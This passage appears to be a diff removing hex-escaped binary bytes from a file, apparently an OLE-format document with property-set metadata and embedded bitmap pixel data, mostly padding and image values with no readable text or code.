-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xfc\xfc\xfc\xfb\xfb\xfb\xfc\xfc\xfc\xf8\xf8"
-"\xf8\xf1\xf1\xf1\xf4\xf4\xf4\xf3\xf4\xf4\xf8\xf8\xf8\xfa\xfa\xfa"
-"\xf5\xf5\xf5\xf5\xf5\xf5\xf7\xf7\xf7\xf7\xf7\xf7\xf5\xf5\xf5\xf5"
-"\xf5\xf5\xfb\xfb\xfb\xff\xff\xff\xfe\xfe\xfe\xf5\xf5\xf5\xf6\xf6"
-"\xf7\xfd\xfd\xfd\xf2\xf2\xf2\xf9\xf9\xf9\xfb\xfb\xfb\xf7\xf7\xf7"
-"\xf3\xf3\xf3\xfb\xfc\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xf2\xf2\xf2\xd7\xd7\xd7\xd7\xd7\xd7\xcf\xcf"
-"\xcf\xc7\xc8\xc7\xcc\xcd\xcd\xca\xca\xcb\xca\xca\xca\xd3\xd3\xd4"
-"\xcc\xcd\xcd\xc7\xc8\xc8\xc4\xc5\xc5\xd4\xd5\xd5\xc4\xc4\xc4\xc7"
-"\xc8\xc7\xdb\xdc\xdb\xbe\xbf\xbf\xba\xbb\xbc\xc2\xc3\xc4\xd0\xd1"
-"\xd2\xef\xef\xef\xc6\xc6\xc6\xcc\xcd\xcd\xdb\xdb\xdc\xc9\xca\xc9"
-"\xc6\xc6\xc6\xe7\xe7\xe7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xf7\xf7\xf7\xbf\xbf\xc0\xa4\xa5\xa6\xb0\xb1"
-"\xb0\xbd\xbe\xbd\xc3\xc4\xc5\xc1\xc2\xc2\xaf\xaf\xb0\xb2\xb3\xb4"
-"\xb4\xb5\xb6\xb4\xb5\xb5\xb7\xb7\xb7\xca\xcb\xcc\xac\xae\xad\xae"
-"\xb0\xaf\xbe\xbe\xbe\x94\x95\x94\xe5\xe5\xe6\xaa\xab\xab\xba\xbb"
-"\xbc\xe4\xe4\xe5\xd3\xd4\xd4\xb3\xb3\xb3\xb0\xb0\xb0\xb9\xba\xba"
-"\xc0\xc1\xc2\xe7\xe7\xe8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfd\xfd\xfc\xfc"
-"\xfc\xfb\xfb\xfb\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xf4\xf4\xf4\xfd\xfd\xfd\xfd\xfd\xfd\xfa\xfa\xfa"
-"\xf2\xf2\xf2\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x01\x00\x20\x00\x00\x00\x02\x00\x00\x00\xb0\x04\x00\x00"
-"\x48\x00\x00\x00\x00\x6a\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa"
-"\x00\xa1\xf9\x5b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x1c\x00\x00\x00\x67\x00\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x9f\x00\x00\x00\x67\x00\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x22\x01\x00\x00\x2c\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x6a\x02\x00\x00\x99\x03\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x1f\x06\x00\x00\x99\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\xd4\x08\x00\x00\x67\x00\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x57\x09\x00\x00\x67\x00\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\xda\x09\x00\x00\x67\x00\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x5d\x0a\x00\x00\xa6\x00\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x1f\x0b\x00\x00\xdf\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x1a\x0d\x00\x00\xcd\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x03\x10\x00\x00\x88\x03\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\xa7\x13\x00\x00\x52\x03\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x15\x17\x00\x00\x36\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x67\x19\x00\x00\xf6\x00\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x79\x1a\x00\x00\x67\x00\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\xfc\x1a\x00\x00\x02\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x1a\x1c\x00\x00\x6f\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\xa5\x1d\x00\x00\x41\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x02\x20\x00\x00\x94\x04\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\xb2\x24\x00\x00\xc2\x03\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x90\x28\x00\x00\x94\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x40\x2b\x00\x00\x00\x3d\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x9e\x2c\x00\x00\xae\x00\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x68\x2d\x00\x00\x0e\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x92\x2e\x00\x00\xc9\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x77\x30\x00\x00\xde\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x71\x33\x00\x00\x85\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x12\x35\x00\x00\xc8\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\xf6\x37\x00\x00\xa2\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\xb4\x3a\x00\x00\x2e\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\xfe\x3c\x00\x00\x71\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x8b\x3f\x00\x00\xee\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x95\x42\x00\x00\x6f\x03\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x20\x46\x00\x00\x49\x03\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x85\x49\x00\x00\xcf\x00\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x70\x4a\x00\x00\xab\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x37\x4d\x00\x00\x0a\x04\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x5d\x51\x00\x00\xf3\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x6c\x54\x00\x00\x21\x03\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\xa9\x57\x00\x00\x70\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x35\x59\x00\x00\xe4\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x35\x5b\x00\x00\xe0\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x31\x5d\x00\x00\x99\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\xe6\x5f\x00\x00\x6c\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x6e\x62\x00\x00\xbe\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x48\x64\x00\x00\xd2\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x36\x66\x00\x00\xc8\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x1a\x68\x00\x00\x0c\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x42\x6a\x00\x00\x79\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\xd7\x6c\x00\x00\x98\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x8b\x6f\x00\x00\xc9\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x70\x71\x00\x00\x77\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x03\x74\x00\x00\x3b\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x5a\x76\x00\x00\x5c\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\xd2\x78\x00\x00\x01\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x04"
-"\x1c\x00\x00\x00\xe6\x00\x00\x00\x02\x00\x00\x00\x00\x22\x01\x03"
-"\x1e\x01\x00\x00\xbc\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x03"
-"\xf6\x03\x00\x00\x30\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x03"
-"\x42\x06\x00\x00\x92\x00\x00\x00\x02\x00\x00\x00\x00\x22\x01\x03"
-"\x81\x00\x00\x00\x82\x00\x00\x00\xfe\xff\xff\xff\xfe\xff\xff\xff"
-"\xfe\xff\xff\xff\x86\x00\x00\x00\x87\x00\x00\x00\x88\x00\x00\x00"
-"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xf0\x06\x00\x00\x83\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x03"
-"\x8f\x08\x00\x00\x0a\x03\x00\x00\x02\x00\x00\x00\x00\x22\x01\x03"
-"\xb5\x0b\x00\x00\x29\x03\x00\x00\x02\x00\x00\x00\x00\x22\x01\x03"
-"\xfa\x0e\x00\x00\xad\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x03"
-"\xc3\x10\x00\x00\x90\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x03"
-"\x6f\x13\x00\x00\x48\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x03"
-"\xd3\x15\x00\x00\xfd\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x03"
-"\xec\x18\x00\x00\x76\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x03"
-"\x7e\x1b\x00\x00\x2c\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x03"
-"\xc6\x1c\x00\x00\x1e\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x03"
-"\x00\x1e\x00\x00\x29\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x03"
-"\x45\x1f\x00\x00\x22\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x03"
-"\x1c\x00\x00\x00\x1a\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x02"
-"\x52\x02\x00\x00\xf5\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x02"
-"\x63\x04\x00\x00\xec\x01\x00\x00\x02\x00\x00\x00\x00\x22\x01\x02"
-"\x6b\x06\x00\x00\x17\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x02"
-"\x1c\x00\x00\x00\x26\x02\x00\x00\x02\x00\x00\x00\x00\x22\x01\x01"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x03\x00\x01\x00\x03\x00"
-"\x02\x00\x03\x00\x13\x10\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00"
-"\x03\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\xff\x00\x00\x00"
-"\x13\x00\x00\x00\xdb\x00\x00\x00\x41\x00\x00\x00\x14\x00\x00\x00"
-"\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x03\x00\x01\x00\x03\x00"
-"\x02\x00\x03\x00\x13\x10\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00"
-"\x03\x00\x00\x00\x04\x00\x00\x00\x13\x00\x00\x00\x80\x00\x00\x00"
-"\x13\x00\x00\x00\x6e\x00\x00\x00\x41\x00\x00\x00\x14\x00\x00\x00"
-"\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x03\x00\x01\x00\x03\x00"
-"\x02\x00\x03\x00\x13\x10\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00"
-"\x03\x00\x00\x00\x04\x00\x00\x00\x13\x00\x00\x00\x40\x00\x00\x00"
-"\x13\x00\x00\x00\x37\x00\x00\x00\x41\x00\x00\x00\x14\x00\x00\x00"
-"\xfe\xff\x00\x00\x02\x00\x00\x00\xe0\x85\x9f\xf2\xf9\x4f\x68\x10"
-"\xab\x91\x08\x00\x2b\x27\xb3\xd9\x01\x00\x00\x00\xe0\x85\x9f\xf2"
-"\xf9\x4f\x68\x10\xab\x91\x08\x00\x2b\x27\xb3\xd9\x30\x00\x00\x00"
-"\x18\x5d\x00\x00\x09\x00\x00\x00\x01\x00\x00\x00\x50\x00\x00\x00"
-"\x0a\x00\x00\x00\x58\x00\x00\x00\x0b\x00\x00\x00\x64\x00\x00\x00"
-"\x0c\x00\x00\x00\x70\x00\x00\x00\x0d\x00\x00\x00\x7c\x00\x00\x00"
-"\x0e\x00\x00\x00\x88\x00\x00\x00\x0f\x00\x00\x00\x90\x00\x00\x00"
-"\x10\x00\x00\x00\x98\x00\x00\x00\x11\x00\x00\x00\xa0\x00\x00\x00"
-"\x02\x00\x00\x00\xe4\x04\x00\x00\x40\x00\x00\x00\xa0\x33\xac\x3b"
-"\x79\x7f\xc7\x01\x40\x00\x00\x00\xa0\x33\xac\x3b\x79\x7f\xc7\x01"
-"\x40\x00\x00\x00\xa0\x33\xac\x3b\x79\x7f\xc7\x01\x40\x00\x00\x00"
-"\xa0\x33\xac\x3b\x79\x7f\xc7\x01\x03\x00\x00\x00\x00\x00\x00\x00"
-"\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00"
-"\x47\x00\x00\x00\x70\x5c\x00\x00\xff\xff\xff\xff\x08\x00\x00\x00"
-"\x28\x00\x00\x00\x60\x00\x00\x00\x52\x00\x00\x00\x01\x00\x18\x00"
-"\x00\x00\x00\x00\x40\x5c\x00\x00\x6d\x0b\x00\x00\x6d\x0b\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xeb\xef\xea\xeb\xed\xe8\xea"
-"\xec\xed\xee\xf0\xe8\xe9\xec\xeb\xec\xee\xf9\xf9\xfa\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xeb\xee\xf2\xf2\xf3\xf4\xec\xed"
